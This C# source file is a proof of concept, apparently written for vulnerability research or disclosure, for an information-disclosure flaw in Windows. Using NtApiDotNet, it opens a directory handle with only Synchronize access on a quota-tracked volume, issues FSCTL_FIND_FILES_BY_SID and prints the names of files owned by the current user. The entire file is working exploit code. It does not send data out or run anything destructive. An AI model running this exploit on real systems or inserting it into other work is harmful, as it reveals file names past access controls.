﻿using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;

namespace PoC_FindFileBySid_InfoDisclosure
{
    static class Program
    {
        [Flags]
        enum FileSystemControlFlags
        {
            FILE_VC_CONTENT_INDEX_DISABLED = 0x00000008,
            FILE_VC_LOG_QUOTA_LIMIT = 0x00000020,
            FILE_VC_LOG_QUOTA_THRESHOLD = 0x00000010,
            FILE_VC_LOG_VOLUME_LIMIT = 0x00000080,
            FILE_VC_LOG_VOLUME_THRESHOLD = 0x00000040,
            FILE_VC_QUOTA_ENFORCE = 0x00000002,
            FILE_VC_QUOTA_TRACK = 0x00000001,
            FILE_VC_QUOTAS_INCOMPLETE = 0x00000100,
            FILE_VC_QUOTAS_REBUILDING = 0x00000200
        }

        [StructLayout(LayoutKind.Sequential)]
        struct FILE_FS_CONTROL_INFORMATION
        {
            public LargeIntegerStruct FreeSpaceStartFiltering;
            public LargeIntegerStruct FreeSpaceThreshold;
            public LargeIntegerStruct FreeSpaceStopFiltering;
            public LargeIntegerStruct DefaultQuotaThreshold;
            public LargeIntegerStruct DefaultQuotaLimit;
            public FileSystemControlFlags FileSystemControlFlags;
        }

        static FileSystemControlFlags GetVolumeFlags(string path)
        {
            using (NtFile file = NtFile.Open(NtFileUtils.DosFileNameToNt(Path.GetPathRoot(path)), null, FileAccessRights.Synchronize | FileAccessRights.MaximumAllowed, 
                FileShareMode.Read | FileShareMode.Write, FileOpenOptions.SynchronousIoNonAlert))
            {
                IoStatus io_status = new IoStatus();
                using (var buffer = new SafeStructureInOutBuffer<FILE_FS_CONTROL_INFORMATION>())
                {
                    NtSystemCalls.NtQueryVolumeInformationFile(file.Handle, io_status, buffer, buffer.Length, FsInformationClass.FileFsControlInformation).ToNtException();
                    return buffer.Result.FileSystemControlFlags;
                }
            }
        }

        [StructLayout(LayoutKind.Sequential), DataStart("Sid")]
        struct FindBySidData
        {
            public int Restart;
            public byte Sid;
        }

        static IEnumerable<string> FindFilesBySid(this NtFile file, Sid sid)
        {
            FindBySidData input = new FindBySidData();
            input.Restart = 1;
            byte[] sid_buffer = sid.ToArray();

            using (var buffer = input.ToBuffer(sid_buffer.Length, true))
            {
                buffer.Data.WriteBytes(sid_buffer);
                using (var out_buffer = new SafeHGlobalBuffer(4096))
                {
                    while (true)
                    {
                        var length = file.FsControl(NtWellKnownIoControlCodes.FSCTL_FIND_FILES_BY_SID, buffer, out_buffer);
                        if (length == 0)
                        {
                            yield break;
                        }

                        int ofs = 0;

                        while (ofs < length)
                        {
                            var res_buffer = out_buffer.GetStructAtOffset<FileNameInformation>(ofs);
                            var result = res_buffer.Result;
                            if (result.NameLength > 0)
                            {
                                yield return res_buffer.Data.ReadUnicodeString(result.NameLength / 2);
                            }

                            int total_length = (4 + result.NameLength + 8) & ~7;
                            ofs += total_length;
                        }
                        // Modify restart to 0.
                        buffer.Write(0, 0);
                    }
                }
            }
        }

        static Sid GetOwner()
        {
            using (var t = NtToken.OpenProcessToken())
            {
                return t.Owner;
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    throw new Exception("Specify a directory path");
                }

                string path = Path.GetFullPath(args[0]);
                if (!Directory.Exists(path))
                {
                    throw new Exception("Specify a path which exists");
                }

                if ((GetVolumeFlags(path) & (FileSystemControlFlags.FILE_VC_QUOTA_TRACK | FileSystemControlFlags.FILE_VC_QUOTA_ENFORCE)) == 0)
                {
                    throw new Exception("Directory must be present on a volume with quota tracking");
                }

                Sid owner = GetOwner();
                using (NtFile file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, FileAccessRights.Synchronize, 
                    FileShareMode.Read, FileOpenOptions.DirectoryFile | FileOpenOptions.SynchronousIoNonAlert))
                {
                    Console.WriteLine("File only granted {0} access", file.GrantedAccess);
                    foreach (var s in file.FindFilesBySid(owner))
                    {
                        Console.WriteLine(s);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
